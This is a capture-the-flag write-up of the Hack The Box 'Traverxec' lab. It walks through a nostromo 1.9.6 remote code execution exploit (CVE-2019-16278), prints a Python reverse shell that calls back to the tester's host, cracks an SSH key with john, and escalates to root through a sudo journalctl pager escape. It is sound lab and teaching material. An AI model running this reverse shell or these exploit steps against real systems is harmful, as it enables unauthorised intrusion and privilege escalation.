About Hack The Box Pen-testing Labs

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.

Traverxec is an easy difficulty machine retiring this week. We gain initial access by exploiting Nostromo Directory traversal / RCE. Enumerating Nostromo config files, we get to know the home directory of Nostromo, which is running as a privileged user. For root, we exploit sudo privilege on journalctl

Enumeration

As usual, let’s start off with a Nmap scan.

Nmap scan report for 10.10.10.165
Host is up (0.15s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nostromo version 1.9.6 is running on the box. A quick google search shows it’s vulnerable to RCE with directory traversal.

Offensive Security’s Exploit Database Archive

nostromo 1.9.6 – Remote Code Execution. CVE-2019-16278 . remote exploit for Multiple platform
www.exploit-db.com

root@kali:~/htb/boxes/traverxec# python 47837.py -h_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
Usage: cve2019-16278.py <Target_IP> <Target_Port> <Command>

Ok, so this requires 3 parameters, IP, Port, Command.

Boom, we have code execution.

Shell as www-data

Here are contents of my reverse shell code,

root@kali:~/htb/boxes/traverxec# cat pythonshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Enumerating the filesystem, we find the configuration file nhttpd.conf

www-data@traverxec:/var/nostromo/conf$ cat nhtt*
cat nhtt*
MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

LOGS [OPTIONAL]

logpid       logs/nhttpd.pid
SETUID [RECOMMENDED]

user         www-data

BASIC AUTHENTICATION [OPTIONAL]

htaccess      .htaccess
htpasswd      /var/nostromo/conf/.htpasswd

ALIASES [OPTIONAL]

/icons /var/nostromo/icons

HOMEDIRS [OPTIONAL]

homedirs        /home
homedirs_public public_www

There are a couple of interesting things here, first is the username david and authentication file htpasswd and the homedirs . Going through the documentation to understand the conf file,

These are the lines of interest for us,

To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home.

The content of the home directory is handled exactly the same way as a directory in your document root.

You can restrict the access within the home directories to a single subdirectory by defining it via the homedirs_public option.

protected-file-area looks interesting.

www-data@traverxec:/home/david/public_www/protected-file-area$ cat htaccess
cat .htaccess
realm David's Protected File Area. Keep out!

Contents of protected-file-area

Privesc www-data -> david

Transferring backup-ssh-identity-files.tgz onto our box, it has ssh folder of david. The private key id_rsa is encrypted. Let’s get john to work, and he delivers yet again.

Privesc david -> root

David’s home has a separate bin directory.

server-stats.sh has an interesting sudo command on journalctl .

According to gtfobins

journalctl invokes the default pager, which is likely to be less, other functions may apply.

I reduced the size of my terminal so that it invokes less

Final: One thing I liked about this box is that it didn’t require running any scripts to find something obscure, all it required is a careful enumeration, reading documentation, which I think is a hallmark of any top-notch box.

Credit: Preetham Bomma, Security Researcher – Loginsoft